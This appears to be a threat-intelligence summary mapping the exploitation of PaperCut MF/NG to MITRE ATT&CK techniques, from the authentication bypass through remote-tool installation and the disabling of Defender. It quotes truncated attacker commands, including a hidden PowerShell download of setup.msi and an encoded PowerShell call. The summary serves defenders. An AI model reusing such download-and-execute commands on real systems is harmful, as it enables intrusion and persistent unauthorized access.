Critical Vulnerabilities in PaperCut Print Management Software

MITRE Techniques

• [T1190] Exploit Public-Facing Application – The attack exploits PaperCut MF/NG vulnerabilities that enable unauthenticated remote code execution via an authentication bypass. ‘zero-day vulnerabilities against PaperCut MF/NG which allow for unauthenticated remote code execution due to an authentication bypass.’
• [T1068] Privilege Escalation – After bypassing authentication, the attacker can execute arbitrary code on the server running in the context of the NT AUTHORITYSYSTEM account. ‘execute arbitrary code on the server running in the context of the NT AUTHORITYSYSTEM account.’
• [T1021] Remote Services – The threat actor gains persistent remote access and code execution on the victim machine via the installed RMM (Atera, Syncro). ‘gains persistent remote access and code execution on the victim machine via the installed RMM.’
• [T1059.001] PowerShell – Command line exemplars show PowerShell usage to download and execute payloads. ‘cmd /c “powershell.exe -nop -w hidden Invoke-WebRequest …setup.msi”‘
• [T1059.003] Windows Command Shell – Additional stages use cmd.exe to run PowerShell commands and encoded payloads. ‘cmd.exe /c powershell -enc …’
• [T1105] Ingress Tool Transfer – The attacker downloads MSI installers (setup.msi) from remote domains to install post-exploitation tooling. ‘The MSI packages install two different RMM tools: Atera, as already noted, and also Syncro.’
• [T1562.001] Impair Defenses – The attacker attempts to disable Windows Defender and remove cryptominer applications to avoid detection. ‘the file attempts to disable Windows Defender and remove various cryptominer applications if they are installed.’
• [T1071.001] Web Protocols – Cobalt Strike Beacon activity observed in related infrastructure and subdomain activity. ‘beacon activity with a similar-looking subdomain (upd343).’